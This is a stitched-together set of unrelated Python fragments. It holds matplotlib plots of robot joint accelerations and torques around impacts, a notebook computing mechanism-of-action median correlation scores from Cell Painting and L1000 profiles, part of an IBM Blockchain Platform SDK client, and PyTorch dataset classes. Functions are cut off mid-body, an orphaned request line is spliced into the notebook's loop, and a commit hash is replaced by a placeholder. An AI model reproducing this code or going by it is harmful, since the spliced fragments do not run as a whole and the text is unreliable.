# ax44.set_ylim([-120000, 120000])
ax44.set_ylim([-1600, 1600])
ax44.legend(loc='upper left', prop={'size':5}, fancybox=True, framealpha=0.3, shadow=False, borderpad=1 )
ax45 = plt.subplot(615)
plt.plot(time, ddq_upper_bound_velocity_4, 'r--')
plt.plot(time, ddq_lower_bound_velocity_4, 'g--')
plt.plot(time, ddq_4, 'b', label='$\\ddot{q}_4$')
plt.plot(time, real_ddq_upper_bound_velocity_4, 'r')
plt.plot(time, real_ddq_lower_bound_velocity_4, 'g')
ax45.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
ax45.autoscale(enable=True, axis='x', tight=True)
plt.setp(ax45.get_xticklabels(), visible=False)
plt.grid(True)
plt.yticks(fontsize=10)
ax45.locator_params(nbins=y_bins, axis='y')
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
plt.axvspan(impact_time_2[0], impact_time_2[1], color='red', alpha=0.1)
plt.axvspan(impact_time_3[0], impact_time_3[1], color='red', alpha=0.1)
plt.axvspan(impact_time_4[0], impact_time_4[1], color='red', alpha=0.1)
ax45.autoscale(enable=True, axis='y')
ax45.set_ylim([-1800, 3000])
ax45.legend(loc='upper left', prop={'size':5}, fancybox=True, framealpha=0.3, shadow=False, borderpad=1 )
ax46 = plt.subplot(616)
plt.plot(time, ddq_upper_bound_velocity_5, 'r--')
plt.plot(time, ddq_lower_bound_velocity_5, 'g--')
plt.plot(time, ddq_5, 'b', label='$\\ddot{q}_5$')
plt.plot(time, real_ddq_upper_bound_velocity_5, 'r')
plt.plot(time, real_ddq_lower_bound_velocity_5, 'g')
plt.xlabel('Time [s]')
ax46.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
ax46.autoscale(enable=True, axis='x', tight=True)
plt.grid(True)
plt.yticks(fontsize=10)
# ax46.set_ylabel('$\\ddot{q}_5$', **font)
ax46.locator_params(nbins=y_bins, axis='y')
ax46.locator_params(nbins=x_bins, axis='x')
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
plt.axvspan(impact_time_2[0], impact_time_2[1], color='red', alpha=0.1)
plt.axvspan(impact_time_3[0], impact_time_3[1], color='red', alpha=0.1)
plt.axvspan(impact_time_4[0], impact_time_4[1], color='red', alpha=0.1)
ax46.autoscale(enable=True, axis='y')
ax42.set_ylim([-2200, 2200])
ax46.legend(loc='upper left', prop={'size':5}, fancybox=True, framealpha=0.3, shadow=False, borderpad=1 )
fig4.savefig("ddq_velocity_impact_bounds.pdf", bbox_inches='tight')
fig7 = plt.figure(figsize=(12,4))
lower_bound = -25*np.ones(len(ddq_5))
upper_bound = 25*np.ones(len(ddq_5))
y_bins = 8
x_bins = 14
ax71 = fig7.gca()
ax71.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
# plt.plot(time, predict_tauUpper[:,0], 'r--', label='Maximum torque under impacts')
# plt.plot(time, predict_tauLower[:,0], 'g--', label='Minimum torque under impacts')
# plt.plot(time, upper_bound - predict_tauUpper[:,0], 'r', label='Upper bound: Torque')
# plt.plot(time, lower_bound + predict_tauLower[:,0], 'g', label='Lower bound: Torque')
plt.plot(time, upper_bound, 'red', linestyle='-', label='Upper bound: $\overline{\\tau} $', linewidth=2.0)
plt.plot(time, lower_bound, 'darkslategrey', linestyle='-', label='Lower bound: $ \underline{\\tau} $', linewidth=2.0)
ax71.locator_params(nbins=y_bins, axis='y')
ax71.locator_params(nbins=x_bins, axis='x')
plt.setp(ax71.get_xticklabels(), visible=False)
plt.grid(True)
ax71.legend(frameon=False, loc='lower left', prop=fontP)
plt.title("Joint torque constraints [$Nm$]")
plt.yticks(fontsize=10)
ax71.locator_params(nbins=y_bins, axis='y')
plt.plot(time, tau[:,0], 'mediumblue', label='Torque: $\\tau_0 $')
plt.plot(time, tau[:,1], 'indigo', label='Torque: $\\tau_1 $')
plt.plot(time, tau[:,2], 'magenta', label='Torque: $\\tau_2 $')
plt.plot(time, tau[:,3], 'crimson', label='Torque: $\\tau_3 $')
plt.plot(time, tau[:,4], 'peru', label='Torque: $\\tau_4 $')
plt.plot(time, tau[:,5], 'darkorange', label='Torque: $\\tau_5 $')
ax71.legend(loc='upper left', prop={'size':6}, fancybox=True, framealpha=0.3, shadow=False, borderpad=1 , handlelength=4)
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
ax71.set_ylim([-28, 28])
ax71.xaxis.set_major_formatter(FormatStrFormatter('%.1f'))
plt.xlabel('Time [$s$]')
plt.setp(ax71.get_xticklabels(), visible=True)
ax71.autoscale(enable=True, axis='x', tight=True)
plt.grid(True)
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
fig7.savefig("All_torque_impact_bounds.pdf", bbox_inches='tight')
fig7 = plt.figure(figsize=(6,2))
# fig8, (ax80, ax81) = plt.subplots(nrows=2, ncols=1)
# ax80 = plt.subplot(211)
ax80 = fig7.gca()
# set up subplot grid
gridspec.GridSpec(4,1)
# plt.subplot2grid((4,1), (0,0), colspan=1, rowspan=1)
plt.plot(time, ee_v[:,0], 'b', label='$v_{n}$')
plt.title("Contact velocity [$m/s$] ", fontsize=10)
ax80.autoscale(enable=True, axis='y', tight=True)
ax80.autoscale(enable=True, axis='x', tight=True)
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
plt.axvspan(impact_time_2[0], impact_time_2[1], color='red', alpha=0.1)
plt.axvspan(impact_time_3[0], impact_time_3[1], color='red', alpha=0.1)
plt.axvspan(impact_time_4[0], impact_time_4[1], color='red', alpha=0.1)
plt.grid(True)
ax80.locator_params(nbins=6, axis='y')
plt.yticks(fontsize=10)
plt.xticks(fontsize=10)
# ax80.legend(prop={'size':6}, fancybox=True, framealpha=0.3, shadow=False, borderpad=2, handlelength=4 )
plt.xlabel('Time [s]', fontsize=10)
ax71.set_xlim([0, 1.2])
# plt.text(1.2, 0.16, r'$v_{n} = 0.163 m/s$',
# {'color': 'k', 'fontsize': 10, 'ha': 'center', 'va': 'center',
# 'bbox': dict(boxstyle="round", fc="w", ec="k", pad=0.2)})
plt.text(1.05, 0.155, r'$v_{n} = 0.155 m/s$',
{'color': 'k', 'fontsize': 10, 'ha': 'center', 'va': 'center',
'bbox': dict(boxstyle="round", fc="w", ec="k", pad=0.2)})
plt.annotate("", xy=(0.9, 0.155), xycoords='data',
xytext=(0.8, 0.155), textcoords='data',
arrowprops=dict(arrowstyle="<-", connectionstyle="arc3"))
fig7.savefig("contact_velocity.pdf", bbox_inches='tight')
# fig8.set_figheight(3)
# fig8.set_figwidth(10)
fig8 = plt.figure(figsize=(6,5))
lower =-200
upper = 200
lower_bound = lower*np.ones(len(ddq_5))
upper_bound = upper*np.ones(len(ddq_5))
# lower_bound = -25*np.ones(len(ddq_5))
# upper_bound = 25*np.ones(len(ddq_5))
y_bins = 8
x_bins = 12
ax81 = fig8.gca()
# plt.subplot2grid((4,1), (1,0), colspan=1, rowspan=3)
ax81.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
ax81.xaxis.set_major_formatter(FormatStrFormatter('%.1f'))
plt.plot(time, upper_bound, 'red', linestyle='-.', label='Upper bound: $\delta \overline{\\tau} $ ', linewidth=2.0)
plt.plot(time, lower_bound, 'darkslategrey', linestyle='-.', label=r'Lower bound: $\delta \underline{\tau}$ ', linewidth=2.0)
ax81.set_xlim([0, 1.2])
plt.setp(ax81.get_xticklabels(), visible=True)
#!/usr/bin/env python
# coding: utf-8
# ## Consensus Signatures
#
# A consensus signature can be defined as a perturbation-specific summary profile acquired by aggregating replicate level information.
#
# ### - Consensus Datasets
#
# 1. Median Aggregation
# - consensus_median (whole plate normalization)
# - consensus_median_dmso (dmso normalization).
#
#
#
#
#
# 2. Modified Z Score Aggregation (MODZ)
# - consensus_modz (whole plate normalization)
# - consensus_modz_dmso (dmso normalization)
#
# The first approach weights each replicate equally.
# The second approach weights replicates by average similarity to other replicates.
#
#
#
# ### The goal here:
# - is to determine the median score of each MOA (mechanism of action) per dose, computed as the median of the correlation values between compounds sharing that MOA.
#
#
#
#
#
# ### Note:
#
# To calculate the median score for each of the four consensus datasets, this notebook has to be run four times, once per dataset.
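# #### Illustrative sketch: median vs MODZ aggregation
#
# The cell below is an editorial sketch (not part of the original analysis). On a toy
# (replicate x feature) matrix it shows the idea behind the two consensus strategies:
# median aggregation weights every replicate equally, while a MODZ-style aggregation
# weights each replicate by its average Spearman correlation to the other replicates.
# The weighting actually used to build the consensus files is implemented upstream in
# the lincs-cell-painting repository; the helper below is only an approximation.
import numpy as np
import pandas as pd

def modz_sketch(replicates):
    """replicates: (n_replicates, n_features) array with n_replicates >= 3."""
    # replicate-by-replicate Spearman correlation matrix
    corr = pd.DataFrame(replicates.T).corr(method="spearman").values
    np.fill_diagonal(corr, 0)
    # average similarity of each replicate to all the others
    weights = corr.sum(axis=1) / (len(replicates) - 1)
    weights = np.clip(weights, 0, None)
    if weights.sum() == 0:
        weights = np.ones(len(replicates))  # fall back to equal weights
    weights = weights / weights.sum()
    return weights @ replicates

toy = np.array([[1.0, 2.0, 3.0], [1.1, 2.1, 2.9], [5.0, -1.0, 0.0]])
median_consensus = np.median(toy, axis=0)  # equal-weight summary profile
modz_consensus = modz_sketch(toy)          # similarity-weighted summary profile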
# In[1]:
import os
import pathlib
import pandas as pd
import numpy as np
from collections import defaultdict
import matplotlib.pyplot as plt
get_ipython().run_line_magic('matplotlib', 'inline')
import seaborn as sns
from pycytominer import feature_select
from statistics import median
import random
sns.set_style("darkgrid")
from scipy import stats
import pickle
from io import BytesIO
from urllib.request import urlopen
from zipfile import ZipFile
# In[2]:
def feature_selection(dataset_link):
"""
Perform feature selection by dropping columns with null or
only zeros values, and highly correlated values from the data.
params:
dataset_link: string of github link to the consensus dataset
Returns:
data: returned consensus dataframe
"""
data = pd.read_csv(dataset_link, compression='gzip', error_bad_lines=False)
cols = data.columns.tolist()
drop_cols = [x for x in cols if ((data[x].isnull().sum()) | all(y == 0.0 for y in data[x].values))]
data.drop(drop_cols, axis = 1, inplace = True)
data = feature_select(
data,
operation=["correlation_threshold", "variance_threshold", "blocklist"],
blocklist_file="https://raw.githubusercontent.com/broadinstitute/lincs-cell-painting/1769b32c7cef3385ccc4cea7057386e8a1bde39a/utils/consensus_blocklist.txt"
)
return data
# In[3]:
commit = "<PASSWORD>"
consensus_median_link = f'https://github.com/broadinstitute/lincs-cell-painting/blob/{commit}/consensus/2016_04_01_a549_48hr_batch1/2016_04_01_a549_48hr_batch1_consensus_median.csv.gz?raw=true'
consensus_median_dmso_link = f'https://github.com/broadinstitute/lincs-cell-painting/blob/{commit}/consensus/2016_04_01_a549_48hr_batch1/2016_04_01_a549_48hr_batch1_consensus_median_dmso.csv.gz?raw=true'
consensus_modz_link = f'https://github.com/broadinstitute/lincs-cell-painting/blob/{commit}/spherized_profiles/consensus/2016_04_01_a549_48hr_batch1_dmso_spherized_profiles_with_input_normalized_by_dmso_consensus_modz.csv.gz?raw=true'
consensus_modz_dmso_link = f'https://github.com/broadinstitute/lincs-cell-painting/blob/{commit}/consensus/2016_04_01_a549_48hr_batch1/2016_04_01_a549_48hr_batch1_consensus_modz_dmso.csv.gz?raw=true'
# In[4]:
data = feature_selection(consensus_modz_link)
# In[5]:
data.shape
# In[6]:
data_dir = pathlib.Path("../../Profiles_level4/L1000/L1000_figshare_data")
os.listdir(data_dir) ##files in L1000 downloaded dataset
# ### Mechanism of actions (MOAs) - Alignment of L1000 and Cell Painting MOAs
#
# - Align the **L1000 pert_info meta_data** with the **Cell-painting meta_data** based on **broad id**. Fill null values in the cell painting MOA column with the corresponding L1000 MOAs of the same broad sample id, and vice versa for the L1000 data. The L1000 MOAs are then used for further analysis, because they contain the most distinct MOAs.
# In[7]:
def merge_align_moa(data_dir, cp_moa_link, data):
"""
This function aligns L1000 MOAs with the cell painting MOAs
and further fill null MOAs in one of the them (cell painting or L1000)
with another, so far they are of the same broad sample ID.
It also merge the aligned MOA metadata dataframe with the consensus data
based on 'broad_sample_id' and outputs the dataframe with MOAs and another one
where the broad samples has no MOAs (null moa values).
params:
data_dir: directory that contains L1000 files
cp_moa_link: github link to cell painting MOA metadata information .csv file
data: consensus dataframe
Returns:
data_moa: merged consensus dataframe with moas
no_moa_data: merged consensus dataframe without moas
"""
df_pertinfo_cp = pd.read_csv(cp_moa_link, sep="\t")
df_pertinfo_L1000 = pd.read_csv(os.path.join(data_dir, 'REP.A_A549_pert_info.txt'), delimiter = "\t")
df_pertinfo_L1000.rename(columns={"pert_id": "broad_id", "pert_iname": "pert_iname_L1000", "moa": "moa_L1000"},
inplace = True)
df_pertinfo_cp.rename(columns={"pert_iname": "pert_iname_cell_painting", "moa": "moa_cell_painting"},
inplace = True)
df_pertinfo = pd.merge(df_pertinfo_L1000, df_pertinfo_cp, on=['broad_id'], how='outer')
##fill NaNs moa_L1000, pert_iname_L1000, with corresponding values in cell_painting and VICE VERSA for Cell_Painting
df_pertinfo['moa_L1000'].fillna(value=df_pertinfo['moa_cell_painting'], inplace=True)
df_pertinfo['pert_iname_L1000'].fillna(value=df_pertinfo['pert_iname_cell_painting'], inplace=True)
df_pertinfo['moa_cell_painting'].fillna(value=df_pertinfo['moa_L1000'], inplace=True)
df_pertinfo['pert_iname_cell_painting'].fillna(value=df_pertinfo['moa_L1000'], inplace=True)
df_pertinfo = df_pertinfo[['broad_sample', 'broad_id', 'pert_iname_L1000', 'moa_L1000']].copy()
df_pertinfo.rename(columns={"pert_iname_L1000": "pert_iname", "moa_L1000":"moa", "broad_sample":'Metadata_broad_sample'},
inplace = True)
df_pertinfo['Metadata_broad_sample'].fillna('DMSO', inplace=True)
data_moa = data.merge(df_pertinfo, on='Metadata_broad_sample', how = 'outer')
no_moa_data = data_moa[data_moa['moa'].isnull()].copy().reset_index(drop = True)
data_moa.drop(data_moa[data_moa['moa'].isnull()].index, inplace = True)
data_moa.reset_index(drop= True, inplace = True)
for col in ['pert_iname', 'moa']:
data_moa[col] = data_moa[col].apply(lambda x: x.lower())
return data_moa, no_moa_data
# In[8]:
moa_dataset = "https://github.com/broadinstitute/lincs-cell-painting/blob/master/metadata/moa/repurposing_info_external_moa_map_resolved.tsv?raw=true"
df_all_moa, df_no_moa = merge_align_moa(data_dir, moa_dataset, data)
df_all_moa.loc[df_all_moa.Metadata_broad_sample == 'DMSO', "Metadata_dose_recode"] = 0
print(df_all_moa.shape)
df_all_moa.head()
# In[9]:
# Load common compounds
common_file = pathlib.Path("..", "..", "..", "6.paper_figures", "data", "significant_compounds_by_threshold_both_assays.tsv.gz")
common_df = pd.read_csv(common_file, sep="\t")
common_compounds = common_df.compound.unique().tolist()
print(len(common_compounds))
# In[10]:
# Only calculate using common compounds
df_moa = df_all_moa.query("pert_iname in @common_compounds")
df_moa.shape
# In[11]:
# How many total MOAs in common
moa_list = (
pd.DataFrame(
pd.concat([
pd.Series(x) for x in df_moa.moa.str.split("|")
])
.dropna(), columns=['moa']
)
)
moa_list.moa = moa_list.moa.str.lower()
moa_list = (
pd.DataFrame(
moa_list.moa.value_counts()
)
.reset_index()
.rename(columns={"moa": "compound_count", "index": "moa"})
)
print(moa_list.moa.nunique())
# In[12]:
# How many MOAs with greater than 3 compounds?
moa_list = moa_list.assign(num_unique_cpd=moa_list.compound_count / 6)
moa_list_subset = moa_list.query("num_unique_cpd > 3")
print(moa_list_subset.moa.nunique())
# In[13]:
df_no_moa.shape
# In[14]:
##list of "Broad samples" WITHOUT Mechanism of Actions (MOA) after aligning L1000 and Cell painting MOAs
df_no_moa['Metadata_broad_sample'].unique().tolist()
# ### Next:
#
# ### - Get Correlation (using Spearman coefficient) between compounds for all DOSES (1 - 6).
#
# ### - Then, get the correlation values between compounds of each particular MOA, and calculate the median of these correlation values.
#
# ## Recoding Dose Information
#
# The Drug Repurposing Hub collected data on 6 to 7 dose points per compound.
# In general, most doses are very near the following 7 dose points (mmoles per liter):
#
# > [0.04, 0.12, 0.37, 1.11, 3.33, 10, 20]
#
# Therefore, to make it easier to filter by dose when comparing compounds, we first align the doses collected in the dataset to their nearest dose point above.
# We then recode the dose points into ascending numerical levels and add a new metadata annotation `dose_recode` to the consensus signatures.
#
# | Dose | Dose Recode |
# | :--: | :---------: |
# | 0 (DMSO) | 0 |
# | ~0.04 | 1 |
# | ~0.12 | 2 |
# | ~0.37 | 3 |
# | ~1.11 | 4 |
# | ~3.33 | 5 |
# | ~10 | 6 |
# | ~20 | 7 |
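# #### Illustrative sketch: dose recoding
#
# An editorial sketch (not part of the original notebook) of the recoding described in the
# table above: each measured dose (mmoles per liter) is snapped to the nearest of the seven
# standard dose points and mapped to the ascending levels 1-7; DMSO profiles are assigned
# dose_recode 0 separately. The production recode was applied upstream when the consensus
# profiles were built, so this helper is only for illustration.
import numpy as np
import pandas as pd

standard_doses = np.array([0.04, 0.12, 0.37, 1.11, 3.33, 10, 20])

def recode_dose(dose_mmol_per_liter):
    """Return the 1-7 dose_recode level for a measured dose."""
    nearest = int(np.argmin(np.abs(standard_doses - dose_mmol_per_liter)))
    return nearest + 1

example_doses = pd.Series([0.041, 0.5, 9.8, 19.7])
example_recode = example_doses.apply(recode_dose)  # -> 1, 3, 6, 7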
# In[15]:
def get_median_score(moa_list, df_dose, df_cpd_agg):
"""
Get the correlation values between compounds of each MOA,
then calculate the median of these correlation values
and assign it as the "median score" of the MOA.
params:
moa_list: list of distinct moas for a particular dose
df_dose: merged consensus and moa dataframe of a particular dose
df_cpd_agg: dataframe of per-compound aggregated (mean) profiles for a particular dose
Returns:
moa_median_score: Dict with moa as the keys, and their median scores as the values
moa_cpds: Dict with moa as the keys, and the list of compounds for each moa as the values
"""
moa_cpds = {}
moa_median_score = {}
for moa in moa_list:
cpds = df_dose['pert_iname'][df_dose['moa'] == moa].unique().tolist()
moa_cpds[moa] = cpds
##taking correlation btw cpds for each MOA
df_cpds = df_cpd_agg.loc[cpds]
cpds_corr = df_cpds.T.corr(method = 'spearman').values
if len(cpds_corr) == 1:
median_val = 1
else:
median_val = median(list(cpds_corr[np.triu_indices(len(cpds_corr), k = 1)]))
moa_median_score[moa] = median_val
return moa_median_score, moa_cpds
# In[16]:
def check_moa(moa_med_score, moa_cpds, df_moa):
"""
Check if all distinct moas in the moa_consensus dataframe (df_moa)
are in moa_med_score & moa_cpd, if not add them as keys and give them
a null value as the median score for moa_med_score and also as values for moa_cpds.
params:
moa_med_score: Dict with moa as the keys, and their median scores as the values
moa_cpds: Dict with moa as the keys, and the list of compounds for each moa as the values
df_moa: merged consensus and moa df with moas
Returns:
moa_med_score: Dict with moa as the keys, and their median scores as the values
moa_cpds: Dict with moa as the keys, and the list of compounds for each moa as the values
"""
moa_list = df_moa['moa'].unique().tolist()
moa_keys = moa_med_score.keys()
for moa in moa_list:
if moa not in moa_keys:
moa_med_score[moa] = np.nan
moa_cpds[moa] = np.nan
return moa_med_score, moa_cpds
# In[17]:
def get_moa_medianscores(df_moa):
"""
Generate a dataframe of distinct moas with their median scores and
corresponding list of compounds for different doses.
params:
df_moa: merged consensus and moa dataframe
Returns:
df_moa_med_score: dataframe of distinct moas with their corresponding median scores
and list of compounds for all doses.
"""
dose_list = list(set(df_moa['Metadata_dose_recode'].unique().tolist()))
print(dose_list)
for dose in dose_list:
df_dose = df_moa[df_moa['Metadata_dose_recode'] == dose].copy()
df_cpd_agg = df_dose.groupby(['pert_iname']).agg(['mean'])
df_cpd_agg.columns = df_cpd_agg.columns.droplevel(1)
df_cpd_agg.rename_axis(None, axis=0, inplace = True)
df_cpd_agg.drop(['Metadata_mmoles_per_liter', 'Metadata_dose_recode'], axis = 1, inplace = True)
url=url,
headers=headers)
response = self.send(request)
return response
#########################
# Download examples
#########################
def get_postman(self,
auth_type: str,
*,
token: str = None,
api_key: str = None,
username: str = None,
password: str = None,
**kwargs
) -> DetailedResponse:
"""
Generate Postman collection.
Generate and download a Postman API Collection. The JSON contains all the APIs
available in the IBP console. It can be imported to the
[Postman](https://www.postman.com/downloads) desktop application. **The examples
in the collection will be pre-populated with authorization credentials.** The
authorization credentials to use must be provided to this API. See the query
parameters for available options.
Choose an auth strategy that matches your environment & concerns:
- **IAM Bearer Auth** - *[Available on IBM Cloud]* - This is the recommended auth
strategy. The same bearer token used to authenticate this request will be copied
into the Postman collection examples. Since the bearer token expires the auth
embedded in the collection will also expire. At that point the collection might be
deleted & regenerated, or manually edited to refresh the authorization header
values. To use this strategy set `auth_type` to `bearer`.
- **IAM Api Key Auth** - *[Available on IBM Cloud]* - The IAM api key will be
copied into the Postman collection examples. This means the auth embedded in the
collection will never expire. To use this strategy set `auth_type` to `api_key`.
- **Basic Auth** - *[Available on OpenShift & IBM Cloud Private]* - A basic auth
username and password will be copied into the Postman collection examples. This is
**not** available for an IBP SaaS instance on IBM Cloud. To use this strategy set
`auth_type` to `basic`.
:param str auth_type: - **bearer** - IAM Bearer Auth - *[Available on IBM
Cloud]* - The same bearer token used to authenticate this request will be
copied into the Postman collection examples. The query parameter `token`
must also be set with your IAM bearer/access token value.
- **api_key** - IAM Api Key Auth - *[Available on IBM Cloud]* - The IAM api
key will be copied into the Postman collection examples. The query
parameter `api_key` must also be set with your IAM API Key value.
- **basic** - Basic Auth - *[Available on OpenShift & IBM Cloud Private]* -
A basic auth username and password will be copied into the Postman
collection examples. The query parameters `username` & `password` must also
be set with your IBP api key credentials. The IBP api key is the username
and the api secret is the password.
:param str token: (optional) The IAM access/bearer token to use for auth in
the collection.
:param str api_key: (optional) The IAM api key to use for auth in the
collection.
:param str username: (optional) The basic auth username to use for auth in
the collection.
:param str password: (optional) The basic auth password to use for auth in
the collection.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse
"""
if auth_type is None:
raise ValueError('auth_type must be provided')
headers = {}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V3',
operation_id='get_postman')
headers.update(sdk_headers)
params = {
'auth_type': auth_type,
'token': token,
'api_key': api_key,
'username': username,
'password': password
}
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'application/json'
url = '/ak/api/v3/postman'
request = self.prepare_request(method='GET',
url=url,
headers=headers,
params=params)
response = self.send(request)
return response
def get_swagger(self,
**kwargs
) -> DetailedResponse:
"""
Download OpenAPI file.
Download the [OpenAPI](https://swagger.io/specification/) specification YAML file
(aka swagger file) for the IBP console. This is the same file that was used to
generate the APIs on this page. This file documents APIs offered by the IBP
console.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `str` result
"""
headers = {}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V3',
operation_id='get_swagger')
headers.update(sdk_headers)
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'text/plain'
url = '/ak/api/v3/openapi'
request = self.prepare_request(method='GET',
url=url,
headers=headers)
response = self.send(request)
return response
class GetComponentEnums:
"""
Enums for get_component parameters.
"""
class DeploymentAttrs(str, Enum):
"""
Set to 'included' if the response should include Kubernetes deployment attributes
such as 'resources', 'storage', 'zone', 'region', 'admin_certs', etc. Default
responses will not include these fields.
**This parameter will not work on *imported* components.**
It's recommended to use `cache=skip` as well if up-to-date deployment data is
needed.
"""
INCLUDED = 'included'
OMITTED = 'omitted'
class ParsedCerts(str, Enum):
"""
Set to 'included' if the response should include parsed PEM data along with base
64 encoded PEM string. Parsed certificate data will include fields such as the
serial number, issuer, expiration, subject, subject alt names, etc. Default
responses will not include these fields.
"""
INCLUDED = 'included'
OMITTED = 'omitted'
class Cache(str, Enum):
"""
Set to 'skip' if the response should skip local data and fetch live data wherever
possible. Expect longer response times if the cache is skipped. Default responses
will use the cache.
"""
SKIP = 'skip'
USE = 'use'
class CaAttrs(str, Enum):
"""
Set to 'included' if the response should fetch CA attributes, inspect
certificates, and append extra fields to CA and MSP component responses.
- CA components will have fields appended/updated with data fetched from the
`/cainfo?ca=ca` endpoint of a CA, such as: `ca_name`, `root_cert`,
`fabric_version`, `issuer_public_key` and `issued_known_msps`. The field
`issued_known_msps` indicates imported IBP MSPs that this CA has issued. Meaning
the MSP's root cert contains a signature that is derived from this CA's root cert.
Only imported MSPs are checked. Default responses will not include these fields.
- MSP components will have the field `issued_by_ca_id` appended. This field
indicates the id of an IBP console CA that issued this MSP. Meaning the MSP's root
cert contains a signature that is derived from this CA's root cert. Only
imported/created CAs are checked. Default responses will not include these fields.
"""
INCLUDED = 'included'
OMITTED = 'omitted'
class GetMspCertificateEnums:
"""
Enums for get_msp_certificate parameters.
"""
class Cache(str, Enum):
"""
Set to 'skip' if the response should skip local data and fetch live data wherever
possible. Expect longer response times if the cache is skipped. Default responses
will use the cache.
"""
SKIP = 'skip'
USE = 'use'
class ListComponentsEnums:
"""
Enums for list_components parameters.
"""
class DeploymentAttrs(str, Enum):
"""
Set to 'included' if the response should include Kubernetes deployment attributes
such as 'resources', 'storage', 'zone', 'region', 'admin_certs', etc. Default
responses will not include these fields.
**This parameter will not work on *imported* components.**
It's recommended to use `cache=skip` as well if up-to-date deployment data is
needed.
"""
INCLUDED = 'included'
OMITTED = 'omitted'
class ParsedCerts(str, Enum):
"""
Set to 'included' if the response should include parsed PEM data along with base
64 encoded PEM string. Parsed certificate data will include fields such as the
serial number, issuer, expiration, subject, subject alt names, etc. Default
responses will not include these fields.
"""
INCLUDED = 'included'
OMITTED = 'omitted'
class Cache(str, Enum):
"""
Set to 'skip' if the response should skip local data and fetch live data wherever
possible. Expect longer response times if the cache is skipped. Default responses
will use the cache.
"""
SKIP = 'skip'
USE = 'use'
class CaAttrs(str, Enum):
"""
Set to 'included' if the response should fetch CA attributes, inspect
certificates, and append extra fields to CA and MSP component responses.
- CA components will have fields appended/updated with data fetched from the
`/cainfo?ca=ca` endpoint of a CA, such as: `ca_name`, `root_cert`,
`fabric_version`, `issuer_public_key` and `issued_known_msps`. The field
`issued_known_msps` indicates imported IBP MSPs that this CA has issued. Meaning
the MSP's root cert contains a signature that is derived from this CA's root cert.
Only imported MSPs are checked. Default responses will not include these fields.
- MSP components will have the field `issued_by_ca_id` appended. This field
indicates the id of an IBP | |
+ torch.sqrt(-2 * tt * torch.log(2 * torch.sqrt(2 * torch.tensor(np.pi) * tt) * err)) # bound
# ks = torch.max(ks, torch.square(tt) + 1) # ensure bouhndary conditions are met
# kk = torch.arange(-4, 6) # we set K to be 10
# try:
# k = torch.tile(kk, (t.shape[0], 1)).cuda()
# except IndexError:
# k = kk.cuda()
# tt_vec = torch.tile(tt, (1, 10))
# pp = torch.cumsum(20.5 * torch.exp(-((20.5 ** 2) / 2) / tt_vec), axis=1)
# pp = pp[:, -1] / torch.sqrt(2 * torch.tensor(np.pi) * torch.squeeze(tt) ** 3)
# pp = pp[:, None]
#
# p = torch.log(pp * torch.exp(-v * a * w - (v ** 2) * torch.tensor(t).cuda() / 2) / (a ** 2))
# return -(p.sum())
# # loss = torch.zeros(len(target),requires_grad=True).cuda()
# # #
# # for i in range(0,len(target)):
# # # loss[i] = - torch.tensor((wfpt_logp1(target[i], 1, bias[i], torch.abs(ndt[i]), drift[i], 1, eps = 1e-10))).cuda()
# # loss[i] = - torch.tensor((wfpt_logp1(target[i], 1, torch.abs(torch.tensor(-0.6)), torch.abs(torch.tensor(0.3)), drift[i], 1, eps = 1e-10))).cuda()
# # if torch.isinf(loss[i]):
# # loss[i] = - torch.log(torch.tensor(8.423e-40).cuda()) #to avoid having inf
# loss = -1 * (((-1/2) * torch.log(2*torch.tensor(pi))) - ((1/2) * torch.log(torch.tensor(1)**2)) -(1/(2*torch.tensor(1)**2))*(target - ndt)**2)
# # print('loss--------------': , loss )
# return torch.mean(loss)
############################# class for dataloaders ########################
# produce the dataset
class SubTrDataset(Dataset):
def __init__(self, transform=None):
self.n_samples = X_train_sub.shape[0]
self.x_data = np.asarray(X_train_sub, dtype=np.float32)
Xmean = np.mean(self.x_data, axis=2)
Xmean_mat = Xmean[:, :, np.newaxis].repeat(X_train_sub.shape[-1], axis=2)
self.x_data = self.x_data - Xmean_mat
self.y_data = np.asarray(y_train_sub, dtype=np.float32)
self.transform = transform
def __getitem__(self, index):
sample = self.x_data[index], self.y_data[[index]]
if self.transform: # if transform is not none
sample = self.transform(sample)
return sample
def __len__(self):
return self.n_samples
# produce the dataset
class ValDataset(Dataset):
def __init__(self, transform=None):
self.n_samples = X_val.shape[0]
self.x_data = np.asarray(X_val, dtype=np.float32)
Xmean = np.mean(self.x_data, axis=2)
Xmean_mat = Xmean[:, :, np.newaxis].repeat(X_val.shape[-1], axis=2)
self.x_data = self.x_data - Xmean_mat
self.y_data = np.asarray(y_val, dtype=np.float32)
self.transform = transform
def __getitem__(self, index):
sample = self.x_data[index], self.y_data[[index]]
if self.transform: # if transform is not none
sample = self.transform(sample)
return sample
def __len__(self):
return self.n_samples
# produce the dataset
class TrDataset(Dataset):
def __init__(self, transform=None):
self.n_samples = X_train0.shape[0]
self.x_data = np.asarray(X_train0, dtype=np.float32)
Xmean = np.mean(self.x_data, axis=2)
Xmean_mat = Xmean[:, :, np.newaxis].repeat(X_train0.shape[-1], axis=2)
self.x_data = self.x_data - Xmean_mat
self.y_data = np.asarray(y_train0, dtype=np.float32)
self.transform = transform
def __getitem__(self, index):
sample = self.x_data[index], self.y_data[[index]]
if self.transform: # if transform is not none
sample = self.transform(sample)
return sample
def __len__(self):
return self.n_samples
# produce the dataset
class TestDataset(Dataset):
def __init__(self, transform=None):
self.n_samples = X_test.shape[0]
self.x_data = np.asarray(X_test, dtype=np.float32)
Xmean = np.mean(self.x_data, axis=2)
